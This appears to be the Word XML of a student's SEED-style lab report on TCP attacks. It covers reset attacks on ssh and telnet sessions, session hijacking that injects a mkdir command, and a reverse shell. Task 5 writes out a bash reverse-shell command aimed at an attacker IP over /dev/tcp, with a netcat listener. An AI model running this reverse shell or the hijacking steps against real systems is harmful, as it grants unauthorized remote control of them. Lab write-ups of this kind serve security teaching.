      <w:r w:rsidRPr="0003078E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44D7B781" wp14:editId="25245164">
            <wp:extent cx="5943600" cy="2541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1270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="571AB459" w14:textId="7DF8D3E4" w:rsidR="0003078E" w:rsidRDefault="0003078E" w:rsidP="00C11906">
      <w:r>
        <w:t>Client screen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC10744" w14:textId="2D0AF27C" w:rsidR="0003078E" w:rsidRDefault="0003078E" w:rsidP="00C11906">
      <w:r w:rsidRPr="0003078E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18054B54" wp14:editId="099CEF50">
            <wp:extent cx="5943600" cy="2973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3070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF325B2" w14:textId="13071714" w:rsidR="00C11906" w:rsidRDefault="0003078E" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">Observation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D2832" w14:textId="7F963048" w:rsidR="0003078E" w:rsidRDefault="0003078E" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">We can see, as soon as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tries to connect, connection </w:t>
      </w:r>
      <w:r w:rsidR="00100801">
        <w:t>is getting reset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC7345D" w14:textId="5830B783" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906"/>
    <w:p w14:paraId="5F2C640C" w14:textId="02B33807" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tries this attack when SSL connection is already established:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079183F" w14:textId="7D556CC0" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906">
      <w:r>
        <w:t>Step 1: connection established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16380BDE" w14:textId="513A0E3D" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906">
      <w:r w:rsidRPr="00100801">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E8A9C7E" wp14:editId="794FD307">
            <wp:extent cx="5943600" cy="22269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26945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B412A2E" w14:textId="3719028B" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906">
      <w:r>
        <w:t>Step2: start the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CA6F00" w14:textId="3E9173CF" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906">
      <w:r w:rsidRPr="00100801">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D14B1E0" wp14:editId="4A82CF2A">
            <wp:extent cx="5943600" cy="225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2345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32882D18" w14:textId="2D36BDEC" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906"/>
    <w:p w14:paraId="2820D629" w14:textId="0EC4AB0E" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906"/>
    <w:p w14:paraId="29E2E87E" w14:textId="15B02B06" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906">
      <w:r>
        <w:t>Client screen: Observation, connection is broken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55835514" w14:textId="28111610" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906">
      <w:r w:rsidRPr="00100801">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1160B1" wp14:editId="6F6E8CE9">
            <wp:extent cx="5943600" cy="289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98775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBF76EA" w14:textId="4000620B" w:rsidR="00100801" w:rsidRDefault="00100801" w:rsidP="00C11906"/>
    <w:p w14:paraId="69BE14E3" w14:textId="3C3440F3" w:rsidR="00D1703A" w:rsidRDefault="00D1703A" w:rsidP="00C11906"/>
    <w:p w14:paraId="3BAC871D" w14:textId="64C83F65" w:rsidR="00D1703A" w:rsidRDefault="00D1703A" w:rsidP="00C11906"/>
    <w:p w14:paraId="7134FA0D" w14:textId="1869C84D" w:rsidR="00D1703A" w:rsidRDefault="00D1703A" w:rsidP="00C11906"/>
    <w:p w14:paraId="2D35E3F4" w14:textId="0776C10A" w:rsidR="00D1703A" w:rsidRDefault="00D1703A" w:rsidP="00C11906"/>
    <w:p w14:paraId="71D8555A" w14:textId="33E8DBE9" w:rsidR="00D1703A" w:rsidRDefault="00D1703A" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">To identify sequence number and </w:t>
      </w:r>
      <w:r w:rsidR="006E62BC">
        <w:t>acknowledgment number, capture packet for the current telnet session.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07495429" w14:textId="669306C7" w:rsidR="006E62BC" w:rsidRDefault="006E62BC" w:rsidP="00C11906">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">On attacker screen: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4F8C4F" w14:textId="46A37CA4" w:rsidR="00D1703A" w:rsidRDefault="00D1703A" w:rsidP="00C11906">
      <w:r w:rsidRPr="00D1703A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21793AF2" wp14:editId="698EC81E">
            <wp:extent cx="5943600" cy="225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53615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F169C3" w14:textId="30730A93" w:rsidR="00BF127F" w:rsidRDefault="00BF127F" w:rsidP="00C11906"/>
    <w:p w14:paraId="48696DBD" w14:textId="0FA3B851" w:rsidR="00BF127F" w:rsidRDefault="00BF127F" w:rsidP="00C11906"/>
    <w:p w14:paraId="16E2A7F0" w14:textId="1051519F" w:rsidR="00BF127F" w:rsidRDefault="00BF127F" w:rsidP="00C11906"/>
    <w:p w14:paraId="1AB4F36A" w14:textId="39EC3829" w:rsidR="00BF127F" w:rsidRPr="00F02830" w:rsidRDefault="00BF127F" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="00F02830" w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00B90BE7" w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F02830">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session hijacking and executing one command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E6206E" w14:textId="3EDE955D" w:rsidR="00B90BE7" w:rsidRDefault="00B90BE7" w:rsidP="00C11906">
      <w:r>
        <w:t>Step 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)  snoop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the traffic between server and client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14DEDC" w14:textId="2771F5B8" w:rsidR="00B90BE7" w:rsidRDefault="00B90BE7" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">Step 2) get last sequence and acknowledge number. Since this packet length is 0, so next packet from client to server will have same sequence and acknowledge but add 1 to Identification </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC564E" w14:textId="0B3DCD34" w:rsidR="00B90BE7" w:rsidRDefault="00B90BE7" w:rsidP="00C11906">
      <w:r>
        <w:t>Step3) craft a packet and send command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /home/seed/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pramod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” and also add “0d00” at the end which will execute the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5E887" w14:textId="46DB1275" w:rsidR="00B03649" w:rsidRPr="00B03649" w:rsidRDefault="00B03649" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03649">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Before attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418CC358" w14:textId="66301025" w:rsidR="00B90BE7" w:rsidRDefault="00B90BE7" w:rsidP="00B03649">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Victim(server</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="006E7EC1">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006E7EC1">
        <w:t xml:space="preserve"> No “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E7EC1">
        <w:t>pramod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E7EC1">
        <w:t>” directory in /home/seed/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE856FF" w14:textId="1138DE4B" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906">
      <w:r w:rsidRPr="006E7EC1">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B9886C4" wp14:editId="102FB4D4">
            <wp:extent cx="5943600" cy="2846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6070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB49C57" w14:textId="58417ACF" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00B03649">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidR="00B03649">
        <w:t xml:space="preserve"> screen</w:t>
      </w:r>
      <w:r>
        <w:t>: packet structure to get SEQ and ACK number:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FE925" w14:textId="30F8E6C1" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906">
      <w:r w:rsidRPr="006E7EC1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FDDC5DA" wp14:editId="12479DDF">
            <wp:extent cx="5943600" cy="31610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1030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B9445E" w14:textId="1F368FF8" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">Client window: session is </w:t>
      </w:r>
      <w:r w:rsidR="00B03649">
        <w:t>intact</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01717D81" w14:textId="644FD785" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906">
      <w:r w:rsidRPr="006E7EC1">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="660BF343" wp14:editId="0282BAB1">
            <wp:extent cx="5943600" cy="2338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8070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="365ABE2C" w14:textId="57123420" w:rsidR="006E7EC1" w:rsidRPr="00B03649" w:rsidRDefault="00B03649" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03649">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>After attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524EE49" w14:textId="4CA6F9B7" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906">
      <w:r>
        <w:t>Attack</w:t>
      </w:r>
      <w:r w:rsidR="00B03649">
        <w:t>er screen</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5919DD7C" w14:textId="43E3B245" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906">
      <w:r w:rsidRPr="006E7EC1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C1AA7D3" wp14:editId="675F08DB">
            <wp:extent cx="5943600" cy="299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7200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="113ACC73" w14:textId="7131FFE3" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906"/>
    <w:p w14:paraId="26328CFF" w14:textId="3B01C607" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906"/>
    <w:p w14:paraId="23E02DDA" w14:textId="3CC6B806" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906"/>
    <w:p w14:paraId="2E8E9027" w14:textId="1BE3B2AA" w:rsidR="00B03649" w:rsidRPr="00B03649" w:rsidRDefault="00B03649" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03649">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Server/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B03649">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Victim :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B03649">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>we can see that “Pramod” folder is created on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112C0A3" w14:textId="718FA20B" w:rsidR="006E7EC1" w:rsidRDefault="006E7EC1" w:rsidP="00C11906">
      <w:r w:rsidRPr="006E7EC1">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44596A29" wp14:editId="0D0EF744">
            <wp:extent cx="5943600" cy="3230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880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4870C4" w14:textId="3762A0F4" w:rsidR="00B03649" w:rsidRPr="00F02830" w:rsidRDefault="00B03649" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Client scree</w:t>
      </w:r>
      <w:r w:rsidR="00F02830" w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: Client console became unresponsive as client has different sequence number and ack number as there was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> extra packet sent from attacker and server ack/seq state is changed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D610AE0" w14:textId="589DC385" w:rsidR="00B03649" w:rsidRDefault="00B03649" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">In background we can see that serve is asking for </w:t>
      </w:r>
      <w:r w:rsidR="00F02830">
        <w:t>acknowledgement again and again as attacker didn’t send ack after attack and client is offset on ack/seq.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E59F433" w14:textId="5DC59019" w:rsidR="00B03649" w:rsidRDefault="00B03649" w:rsidP="00C11906">
      <w:r w:rsidRPr="006E7EC1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DCD0B61" wp14:editId="4CC5AAAB">
            <wp:extent cx="5943600"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50920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35F8A7" w14:textId="54911C3F" w:rsidR="00F02830" w:rsidRDefault="00F02830" w:rsidP="00C11906"/>
    <w:p w14:paraId="5DF58735" w14:textId="2F50F2CB" w:rsidR="00F02830" w:rsidRDefault="00F02830" w:rsidP="00C11906"/>
    <w:p w14:paraId="4F7F16DC" w14:textId="599CC9D7" w:rsidR="00F02830" w:rsidRDefault="00F02830" w:rsidP="00C11906"/>
    <w:p w14:paraId="6EF827BA" w14:textId="4118F69E" w:rsidR="00F02830" w:rsidRDefault="00F02830" w:rsidP="00C11906"/>
    <w:p w14:paraId="74656ADD" w14:textId="71C19C24" w:rsidR="00F02830" w:rsidRDefault="00F02830" w:rsidP="00C11906"/>
    <w:p w14:paraId="2B8FF4A9" w14:textId="0ABA9EB8" w:rsidR="00F02830" w:rsidRDefault="00F02830" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TASK</w:t>
      </w:r>
      <w:r w:rsidR="00AC1654">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02830">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">:  creating reverse shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F550C4" w14:textId="3467A92C" w:rsidR="00F02830" w:rsidRDefault="00F02830" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">This task is in </w:t>
      </w:r>
      <w:r w:rsidR="00AC1654">
        <w:t>continuation of task4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D1DCE5" w14:textId="08B2B2FF" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">Attacker start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on 9090 port and waiting for reverse connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A899BE8" w14:textId="0895D9D2" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906">
      <w:r w:rsidRPr="00AC1654">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FBCBA5F" wp14:editId="0C99B9F0">
            <wp:extent cx="5943600" cy="2118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8360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D20B1A" w14:textId="3A455903" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906">
      <w:r>
        <w:t>Perform task 4 with this command: “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>/10.0.2.4/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11748A54" w14:textId="700EF095" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906">
      <w:r>
        <w:t>After executing step from task4 we will get reverse connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083087B5" w14:textId="7D66EE69" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906">
      <w:r w:rsidRPr="00AC1654">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505B60E3" wp14:editId="6645FA66">
            <wp:extent cx="5943600" cy="4069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69080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D52D06" w14:textId="6CEEE70C" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906"/>
    <w:p w14:paraId="2422AF3F" w14:textId="16505AEC" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906">
      <w:r>
        <w:t>Sever machine: display the written message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BCD618" w14:textId="6A026CC2" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906">
      <w:r w:rsidRPr="00AC1654">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D9F378E" wp14:editId="0A13511C">
            <wp:extent cx="5943600" cy="3619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19500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A133846" w14:textId="3BEA6B50" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906"/>
    <w:p w14:paraId="2B23BF58" w14:textId="6F79FD8D" w:rsidR="00AC1654" w:rsidRDefault="00AC1654" w:rsidP="00C11906">
      <w:r>
        <w:t>Like task</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="008C1811">
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C1811">
        <w:t xml:space="preserve"> console got stuck:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3600FAD7" w14:textId="5CE426A1" w:rsidR="008C1811" w:rsidRDefault="008C1811" w:rsidP="00C11906">
      <w:r w:rsidRPr="008C1811">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C725B1C" wp14:editId="66B8DC31">
            <wp:extent cx="5943600" cy="2047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47875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AADEBB" w14:textId="1BB7329C" w:rsidR="008C1811" w:rsidRDefault="008C1811" w:rsidP="00C11906"/>
    <w:p w14:paraId="5E1D3FCB" w14:textId="65613386" w:rsidR="008C1811" w:rsidRPr="00F02830" w:rsidRDefault="008C1811" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">Observation: we have successfully created a reverse shell from server to attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>10.0.2.4).</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008C1811" w:rsidRPr="00F028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50CCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06A65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143D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2250D8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146"/>
    <w:rsid w:val="0003078E"/>
    <w:rsid w:val="00092697"/>
    <w:rsid w:val="00100801"/>
    <w:rsid w:val="00106FB6"/>
    <w:rsid w:val="00136D99"/>
    <w:rsid w:val="00214B74"/>
    <w:rsid w:val="0030697E"/>
